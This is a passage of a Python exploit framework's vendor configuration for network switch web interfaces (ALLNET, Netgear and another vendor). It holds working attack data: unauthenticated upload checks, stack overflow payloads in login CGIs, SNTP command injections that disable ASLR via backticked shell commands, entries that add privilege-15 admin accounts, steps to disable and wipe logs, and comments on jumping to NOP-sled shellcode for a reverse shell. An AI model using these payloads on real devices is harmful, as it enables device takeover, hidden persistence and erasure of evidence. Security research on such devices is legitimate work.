False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/mnt/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/http_uploadfail',\r\n\t\t\t\t\t\t\t'content':'Copy: Illegal software format', # Not the real content, its the result of invalid firmware (workaround)\r\n\t\t\t\t\t\t\t'content_check':'Copy: Illegal software format',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'login.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in login.cgi (PoC: create file /tmp/VUL.TXT)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/VUL.TXT', # We cannot control the content...\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(40) +'&password='+ '/' * 23 +'/tmp/VUL.TXT&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'content_check':'2',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': 
False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=sys_acctDel',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=0&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. 
Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) 
+'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t#'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'ALLNET': {\r\n\t\t\t\t'vendor': 'ALLNET GmbH Computersysteme',\r\n\t\t\t\t'uri':'https://www.allnet.de/',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': 
{\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=4353',\r\n\t\t\t\t\t\t'status':'/cgi-bin/dispatcher.cgi?cmd=4352',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_4364=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_4364=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': 
True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadfirmware.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadfirmware.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload_runstart_cfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'version_upgrade.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (Frontend to \"httpuploadfirmware.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/version_upgrade.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'content_check':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'factory_reset.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Reset device to factory default (PoC: Too dangerous to 
verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/factory_reset.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Too dangerous to verify',\r\n\t\t\t\t\t\t\t'content_check':'dummy',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sysinfo_config.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'description':'System basic information configuration (Frontend to \"change_mac_addr_set.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sysinfo_config.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'\"/cgi-bin/change_mac_addr_set',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'change_mac_addr_set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"switch_type/sys_hardver\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/change_mac_addr_set.cgi',\r\n\t\t\t\t\t\t\t'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': 
{\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'cmd=547',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. 
We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > 
/tmp/check`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t#'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Netgear': { \r\n\t\t\t\t'vendor': 'NETGEAR Inc.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': 
